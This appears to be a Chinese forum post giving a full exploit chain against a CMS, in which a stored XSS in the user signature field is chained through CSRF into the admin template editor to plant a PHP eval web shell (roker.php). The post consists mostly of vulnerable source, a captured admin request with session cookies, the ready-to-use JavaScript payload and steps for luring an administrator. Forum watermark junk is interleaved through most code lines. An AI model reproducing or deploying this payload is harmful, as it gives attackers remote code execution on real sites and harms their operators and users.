这个 CMS 以前 90 有人发了个 getshell，当时是后台验证文件的问题。
官网已经修补了，所以重新下了源码。
因为后台登入还需要认证码，所以注入就没看了。
存在 XSS。
漏洞文件：user/member/skin_edit.php
<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
6 e* f6 ]7 M! J, }6 ]+ T1 N: o
/ ]/ F! v8 C2 F</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
: o7 D8 P# f# Q8 v( G
* B/ y# ~: A# Q2 F- r+ q</textarea></td></tr>$ }' L3 J8 j) U) T" j" Z
4 B7 C7 w& x' e/ `* [+ `1 \! z
user/do.php
# i6 h% q! M- }9 C& k; J
1 i% B' t9 n( {& }if($op=='zl'){ //资料
+ E! N: ~6 p6 j+ m& p
4 c4 W& Z/ j) i8 n1 f. i! n if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
. u0 z/ i P& _7 Y E6 { exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));) l6 k" {! q: I8 [0 u$ v
+ M$ e( f. K& o* V
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',
6 [$ e3 `5 ^! d$ i) g1 ~9 ?0 ~3 u
# X: m$ G- h+ L f4 q CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
8 U5 A' {; v: p where CS_Name='".$cscms_name."'";
/ ~0 \) {2 g- v+ f
& r: G' a4 i/ |) R if($db->query($sql)){
3 x6 G+ o8 e% M+ t8 L " H" D5 k; g% Y5 l
exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);')); @4 x6 A/ W1 E' Q
/ m; O& y' D4 I, D }else{
5 \+ d7 V0 [$ E6 `6 B" E
0 }7 H, b: ], { exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
" }8 h5 X. E" e7 n3 H# `7 d- p3 N6 J
, r! ]! G# ]* R) O( _ ~5 Q }
0 N n. v8 E5 g& x; B& t
% l* n* H3 f0 u2 j. T. }; X2 `# c, Q4 M) ^( g! I
没有过滤，导致 XSS 产生（签名在 user/do.php 入库时未过滤，skin_edit.php 输出时也未做 HTML 编码）。
后台看了下，很奇葩的是可以写任意格式的文件（name 参数的扩展名没有校验，path 参数还能用 ../ 穿越）。
抓包：
POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
( h3 e4 t- f% E# @3 ~+ bAccept: text/html, application/xhtml+xml, */*: W3 G- j+ r `5 Y0 x" g
/ N- d9 A' }0 J2 p \: W, x: R' g6 Q
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
* T. j4 i+ k7 n. o5 a+ q: N/ G, z% J- ]
+ T: j* A6 @9 I- l' ^8 bAccept-Language: zh-CN
) \5 j0 @' A. Z8 U; |/ k" L- }
0 s2 H; q- Z' ~: [) \3 f) IUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
! ~: S; `& l: S5 @9 A9 [& O: L
5 l- b- ]! A* W+ G ZContent-Type: application/x-www-form-urlencoded
; ~# @1 f! Y( S4 N% V/ W# _
$ |6 S& q/ k3 |7 v LAccept-Encoding: gzip, deflate+ u( ^$ j) X2 r H/ f# r/ v
/ L# |% w$ s7 |2 lHost: 127.0.0.1
1 w8 C7 k. o+ m6 \9 k2 ]8 S: r
5 S' P+ f. {3 w9 ~& P8 uContent-Length: 388 @' ]/ t5 W) i
! t# n+ v. b+ _5 Q; _0 e4 U8 Z9 y
DNT: 1# {4 j3 x& Y! ?& H, _
( e% I: |* J8 ?% O
Connection: Keep-Alive9 \8 A6 Q8 U2 b% X
; q1 c4 D9 J. N( e& uCache-Control: no-cache
. w: F, Y' T' i; i ' q: Q" p) s O
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594. ~: `) Y' T2 G9 d: X `: Y
! @4 M3 J" Y7 G+ k0 m& j- y' K
% h: O! t) a# ^. V$ p) ?4 T/ hname=aaa.php&content=%3Cs%3E%3Ca%25%3E" ~2 M9 y; L2 d! w
于是构造 JS 如下。
<script>
// Payload as posted (forum watermark characters are still interleaved in the
// lines). It runs in the browser of whoever views the stored signature and
// forges a POST to the admin template editor; the browser attaches that
// viewer's own admin session cookies, so this is stored XSS chained into CSRF.
// Server-side defences this relies on being absent: an anti-CSRF token checked
// by admin/skins/skins.php (the captured request above carries none), an
// allow-list of template extensions for `name`, rejection of `..` in `path`,
// and HTML-encoding of the signature on output in skin_edit.php.
; O) _: p; ?! a8 z \# K, xthisTHost = top.location.hostname;
+ U7 W0 k E/ l% V% D
// The target URL is built from the victim's own hostname, so the payload
// carries no hard-coded domain; `path` points into the public skins tree.
; s7 M9 k. k& c6 w- J# n6 g' sthisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
2 G+ M8 x% ?/ l
// Builds a hidden form with the two fields the editor expects (`name`,
// `content` — the same two seen in the captured request) and auto-submits it.
( d. ?( W) x( q! [/ S: Ffunction PostSubmit(url, data, msg) { " H; x, b" y" R5 r9 v: l3 e
var postUrl = url;4 V* f% R" E6 c' d( T& m8 W* V# k
/ [3 y# H& L* w4 |4 g/ Y8 L9 F
var postData = data;
1 [( N# H0 |; }% ]# @' K: Q, |) ? var msgData = msg;
( n$ X! w# E$ B0 R5 D+ Z var ExportForm = document.createElement("FORM"); " d* T% h2 y2 G `! r9 q, }
document.body.appendChild(ExportForm); N! `" n0 I% Z& G" i7 S' w7 o
ExportForm.method = "POST";
5 Q2 h$ z ~! `. }+ j/ H var newElement = document.createElement("input");
: H1 v( I' @* k4 y" w newElement.setAttribute("name", "name");
1 b" j( P: ^9 G newElement.setAttribute("type", "hidden"); 1 ~" [2 G9 t4 T6 e8 E
var newElement2 = document.createElement("input"); 5 t& k7 c. z& [+ ~) n8 f6 F
newElement2.setAttribute("name", "content");
* X. ^! Z3 p1 R/ [6 R' v newElement2.setAttribute("type", "hidden");
, k$ C) o% E! ]* v1 {' Y ExportForm.appendChild(newElement);
I4 e# {/ w; p% q ExportForm.appendChild(newElement2);
& S! e% v* O7 X- x) d1 r newElement.value = postData; 4 Z$ P, H5 D4 `
newElement2.value = msgData;
: d K" S1 X. J( y6 b ExportForm.action = postUrl;
// Submission is automatic; the viewer sees nothing unless the editor's
// response page is rendered.
5 B/ Y1 q; W, U2 r ExportForm.submit();
) O7 @* _/ n' `( y, e) q5 `};5 L/ x7 e( G% a4 Z( r) L
// `name` is a .php filename and `content` is a PHP eval stub; an extension
// allow-list on `name` alone would have rejected this write.
% |* G/ F& S: U3 g/ i h4 SPostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");* L7 K5 j& L' s& D G/ l* V
</script>
在 http://127.0.0.1/user/space.php?ac=edit&op=zl 的修改签名处插入上面的脚本。
用你的账号给管理员写个私信，或者让他访问你的主页 http://127.0.0.1/home/?uid=2（uid 自己改）。
就会在 skins\index\html\ 目录下生成 roker.php 一句话。